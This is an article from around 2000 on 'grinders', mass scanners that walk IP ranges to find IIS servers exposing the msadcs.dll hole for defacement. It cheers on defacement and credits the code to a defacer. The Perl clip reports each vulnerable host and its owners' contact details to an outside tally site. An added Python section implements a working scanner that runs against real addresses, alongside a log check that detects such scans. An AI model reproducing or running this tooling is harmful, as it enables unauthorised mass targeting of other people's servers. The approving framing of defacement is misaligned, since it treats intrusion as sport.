
Grinding for Vulnerabilities


by Russ Rogers - 1/22/00

Don't you just love web page defacements? Some kid jumping on a huge corporate network and making life difficult for another overpaid System Administrator? :) Actually, it's a simple process to lock down a web server (though that's not the process I'm writing about here). It's also a simple process to scan a very large range of IP addresses to find vulnerable servers to exploit, and that is what this piece is about.

Defacers don't normally spend lots of time on one corporate server trying to get in and hack a page. They would rather scan tons of address space and generate a list of every server in that space that is vulnerable to one particular hole. Two examples from the time of writing are the IIS MSADC hole, reached through msadcs.dll, and the notorious phf CGI hole; both can be driven from nothing more than a web browser and end with commands running on the remote host.

The tools used to scan these address spaces are commonly known as "grinders." Grinders are fairly simple to write if you have some programming experience. I prefer Perl since it is portable and works well on most platforms. Solid networking skills are a must.

The grinder takes the IP space you provide and walks every address in it. For each address it connects to one specific port and tests for one specific vulnerability. Pretty cool. The test itself is just sending a request to that port and reading what comes back: if the reply matches what a vulnerable server is known to send, the address is logged as exploitable in a text file. Bear in mind that this is a fingerprint, not an exploit: a server whose banner has been changed can slip past it, and a banner match alone is not proof that the hole is really there.

For security reasons (grin), I'm not going to post an entire exploit here, but I do want to put up a sample so you can see how it works. The first part opens a connection to port 80 at an address, asks the web server at the other end for its root page, and looks at the Server header that comes back. If the server claims to be IIS 4.0, it then requests /msadc/msadcs.dll and checks the reply for the signature of the vulnerable component. The following clip shows the heart of the software.

use strict;
use LWP::UserAgent;
use HTTP::Request;

# $ARGV[0] names a text file with one host or IP address per line.
open(INP, $ARGV[0]) or die "Can't open $ARGV[0]: $!\n";
while (<INP>) {
    chomp;
    my $host = $_;

    print "Checking $host...";
    my $ua = LWP::UserAgent->new;
    # Announce the scanner in the User-Agent header. LWP::UserAgent calls this
    # method agent(); the clip as it circulated called product(), which does not exist.
    $ua->agent("MSADC Scanner 1.0; http://www.irc-servers.com;");
    my $request = HTTP::Request->new(GET => "http://$host/");
    my $reply = $ua->request($request);

    # No Server: header means nothing answered on port 80 (or the connect failed).
    if (!($reply->server)) {
        print "No Webserver Running\n";
        next;
    }

    if ($reply->server =~ /Microsoft-IIS\/4\.0/) {
        # Ask for the RDS DataFactory component; a box with it exposed answers
        # with an application/x-varg document.
        $request = HTTP::Request->new(GET => "http://$host/msadc/msadcs.dll");
        $reply = $ua->request($request);

        if ($reply->content =~ /application\/x-varg/) {
            print "Vulnerable\n";

            # Split host.domain.tld and look up the domain's contacts. This assumes
            # a hostname like www.example.com; on a bare IP the captures are meaningless.
            # (get_contacts is defined elsewhere in the full program.)
            $host =~ /(.+)\.(.+)\.(.+)/;
            my ($lname, $fname, $email) = get_contacts("$2.$3.");

            # Report the hit to the central tally site.
            my $ui = LWP::UserAgent->new;
            my $irqst = HTTP::Request->new(GET => "http://msadc.irc-servers.com/add.php3?host=$host&lname=$lname&first=$fname&email=$email");
            $ui->request($irqst);
        } else {
            print "Not Vulnerable\n";
        }
    } else {
        print "Not Vulnerable\n";
    }
}
close(INP);

Now before anyone has a cow, I didn't write this particular code. It was given to me by Rackmount. You can find a listing of his conquests at attrition.org.
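To make the structure above concrete, here is an added example in Python (my code, not the author's and not Rackmount's) of the grinder loop as the article describes it: expand an IP space, probe each address, classify the reply, and log the hits to a text file. The only things taken from the page are the two strings the Perl clip keys on (a Server header of Microsoft-IIS/4.0, then /msadc/msadcs.dll answering with application/x-varg). Everything else is an assumption: HTTP/1.0 on port 80, the verdict names, the canned replies and log lines (constructed so the demo runs offline), and the Apache combined log format used on the defender's side, where the same two strings are enough to spot a grinder pass in the access log.

```python
# Added example (not the article's code): a grinder in the shape the article
# describes, plus the trail it leaves in the target's web log. Canned replies
# and log lines are constructed so the demo runs offline.
import ipaddress
import re
import socket

# The two strings the Perl clip keys on, reused here as the signature.
PROBE_PATH = "/msadc/msadcs.dll"
USER_AGENT = "MSADC Scanner 1.0; http://www.irc-servers.com;"

def expand_targets(spec):
    """Walk the IP space: a CIDR block ("10.0.0.0/29") or a single address."""
    if "/" in spec:
        for addr in ipaddress.ip_network(spec, strict=False).hosts():
            yield str(addr)
    else:
        yield str(ipaddress.ip_address(spec))

def parse_response(raw):
    """Split a raw HTTP reply into (Server header or None, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    m = re.search(r"^Server:[ \t]*(.+?)\r?$", head, re.M | re.I)
    return (m.group(1) if m else None), body

def http_get(host, path, timeout=5.0):
    """One HTTP/1.0 GET to port 80 (assumed); (None, "") when nothing answers."""
    req = (f"GET {path} HTTP/1.0\r\nHost: {host}\r\n"
           f"User-Agent: {USER_AGENT}\r\nConnection: close\r\n\r\n")
    try:
        with socket.create_connection((host, 80), timeout=timeout) as s:
            s.sendall(req.encode())
            raw = b""
            while chunk := s.recv(4096):
                raw += chunk
    except OSError:
        return None, ""
    return parse_response(raw.decode("latin-1"))

def classify(host, fetch=http_get):
    """Per-host verdict, same logic as the clip. It is a banner fingerprint:
    an edited or suppressed Server header gives a false negative."""
    server, _ = fetch(host, "/")
    if not server:
        return "no-webserver"
    if "Microsoft-IIS/4.0" not in server:
        return "not-vulnerable"
    _, body = fetch(host, PROBE_PATH)
    return "vulnerable" if "application/x-varg" in body else "not-vulnerable"

def grind(spec, fetch=http_get, logfile=None):
    """Scan the space; return the hits and append them to a text file."""
    hits = []
    for host in expand_targets(spec):
        verdict = classify(host, fetch)
        print(f"Checking {host}... {verdict}")
        if verdict == "vulnerable":
            hits.append(host)
    if logfile and hits:
        with open(logfile, "a") as f:
            f.writelines(h + "\n" for h in hits)
    return hits

# Defender's side: the same two strings are the grinder's footprint. Log format
# assumed to be Apache "combined"; IIS W3C logs would need a different regex.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*"'
                    r' \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def grinder_hits(lines):
    """(source, path, user-agent) for requests touching the RDS component
    or carrying the scanner's User-Agent."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (m["path"].lower().startswith(PROBE_PATH)
                  or "MSADC Scanner" in m["ua"]):
            found.append((m["src"], m["path"], m["ua"]))
    return found

# Constructed replies: .1 is the vulnerable case, .2 is IIS 4.0 without the
# RDS component, .3 is Apache, everything else has no web server at all.
CANNED = {
    "10.0.0.1": {"/": ("Microsoft-IIS/4.0", ""),
                 PROBE_PATH: ("Microsoft-IIS/4.0", "Content-Type: application/x-varg")},
    "10.0.0.2": {"/": ("Microsoft-IIS/4.0", ""),
                 PROBE_PATH: ("Microsoft-IIS/4.0", "<html>404 Not Found</html>")},
    "10.0.0.3": {"/": ("Apache/1.3.9 (Unix)", "<html>ok</html>")},
}

def canned_fetch(host, path):
    return CANNED.get(host, {}).get(path, (None, ""))

SAMPLE_LOG = [  # constructed: one grinder pass from 192.0.2.7, then a normal visitor
    '192.0.2.7 - - [22/Jan/2000:03:14:05 +0000] "GET / HTTP/1.0" 200 1270 "-" "MSADC Scanner 1.0; http://www.irc-servers.com;"',
    '192.0.2.7 - - [22/Jan/2000:03:14:06 +0000] "GET /msadc/msadcs.dll HTTP/1.0" 200 12 "-" "MSADC Scanner 1.0; http://www.irc-servers.com;"',
    '198.51.100.3 - - [22/Jan/2000:03:15:00 +0000] "GET /index.html HTTP/1.0" 200 4532 "-" "Mozilla/4.7 [en] (WinNT; I)"',
]

if __name__ == "__main__":
    print(grind("10.0.0.0/29", fetch=canned_fetch), grinder_hits(SAMPLE_LOG))
```

The fetch function is injectable, so classify() and grind() can be exercised against the canned replies without touching the network; leave the default http_get in place to scan for real. The caveat from earlier stands in code form: classify() trusts the banner, so an IIS 4.0 box with a rewritten Server header is reported as not vulnerable, while on the defender's side the hard-coded User-Agent and the request for /msadc/msadcs.dll are trivial to pick out of the log and just as trivial for a scanner author to change.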